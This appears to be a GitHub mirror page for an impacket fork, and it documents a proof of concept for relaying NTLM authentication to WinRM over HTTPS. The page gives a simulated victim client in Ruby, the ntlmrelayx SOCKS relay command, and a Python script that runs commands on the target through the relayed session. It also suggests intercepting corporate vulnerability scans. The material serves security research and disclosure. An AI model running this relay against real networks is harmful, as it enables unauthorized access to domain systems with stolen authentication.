jmk-foofus / impacket Goto Github PK
View Code? Open in Web Editor NEWThis project forked from fortra/impacket
Impacket is a collection of Python classes for working with network protocols.
Home Page: https://www.coresecurity.com
License: Other
This project forked from fortra/impacket
Impacket is a collection of Python classes for working with network protocols.
Home Page: https://www.coresecurity.com
License: Other
MadSec 2023/12/12 Presentation (YouTube) [37:53]
CypherCon 2024 Overview
The following is a simple proof-of-concept of relaying WinRM with the modified ntlmrelayx tool.
A Ruby script is used to simulate a client connecting to our service and attempting to authenticate. This initial client connection is done using WinRM over HTTP (5985/tcp). In a real world scenario, this would be coerced in some manner. The relay server running ntlmrelayx bounces the connection to our target server using WinRM over HTTPS (5986/tcp). It further opens a local SOCKS proxy. The attacker then sends WinRM commands through the SOCKS proxy and abuses the established authenticated session.
The target server is a basic Windows 2019 domain-joined installation. It has WinRM configured for HTTPS (5986/tcp). The default WinRM channel binding token policy in this configuration is "Relaxed". This means that if the client does not supply a CBT, no anti-relay restrictions are enforced. The WinRM client does not include a CBT, which enables our relay to work. The target service must be WinRM over HTTPS. The default unencrypted WinRM over HTTP (5985/tcp) encrypts the message body using the client's NTLM hash, breaking the relay attack.
Relay Target
Client (Coerced Victim)
#!/usr/bin/ruby
require 'winrm'
opts = {
endpoint: 'http://192.168.10.30:5985/wsman',
user: 'DOMAIN\Administrator',
password: 'TheAccount'sLegitPassword',
}
conn = WinRM::Connection.new(opts)
conn.shell(:powershell) do |shell|
output = shell.run('hostname') do |stdout, stderr|
STDOUT.print stdout
STDERR.print stderr
end
puts "The script exited with exit code #{output.exitcode}"
end
ntlmrelayx.py -t "winrms://192.168.10.10" -socks
proxychains winrm-attack.py
#!/usr/bin/python3
import winrm
host = 'https://192.168.10.10:5986'
domain = 'DOMAIN'
user = 'Administrator'
password = 'NotTheRealPassword'
session = winrm.Session(host, auth=('{}@{}'.format(user,domain), password), transport='basic', server_cert_validation='ignore')
result = session.run_ps('hostname')
print(result)
result = session.run_ps('whoami')
print(result)
A potential real world abuse scenario for the WinRM relay has a corporate network scanner as the client. For example, multiple network discovery tools and vulnerability scanners (e.g., Rapid7 Nexpose) use WinRM to "discover" assets. Their documentation further typically guides users to configure the authenticated scans to use privileged domain credentials. A malicious actor simply needs to be running the relay while a network scan is being performed. As many organisations perform nightly or weekly scans, it is reasonable to assume that intercepting a scan is plausible.
IP addresses must be used, as ntlmrelayx appears to have issues resolving hostname and matching proxy connections.
cmd_hostname.xml.txt
TODO: Add basic KeepAlive. Currently, must use SOCKS proxy shortly after connection is relayex.
Test case: Rapid7 Nexpose configured for basic authenticated scan against relay server. 5985/tcp is only configured scan port, and scan template is a limited CIS benchmark. The scan appears to be sending too many requests for ntlmrelayx to track. The target server's challenges are being applied to the incorrect responses.Solving this issue is critical to the attack being useful in the real world.
A declarative, efficient, and flexible JavaScript library for building user interfaces.
๐ Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
An Open Source Machine Learning Framework for Everyone
The Web framework for perfectionists with deadlines.
A PHP framework for web artisans
Bring data to life with SVG, Canvas and HTML. ๐๐๐
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
Some thing interesting about web. New door for the world.
A server is a program made to process requests and deliver data to clients.
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
Some thing interesting about visualization, use data art
Some thing interesting about game, make everyone happy.
We are working to build community through open source technology. NB: members must have two-factor auth.
Open source projects and samples from Microsoft.
Google โค๏ธ Open Source for everyone.
Alibaba Open Source for everyone
Data-Driven Documents codes.
China tencent open source team.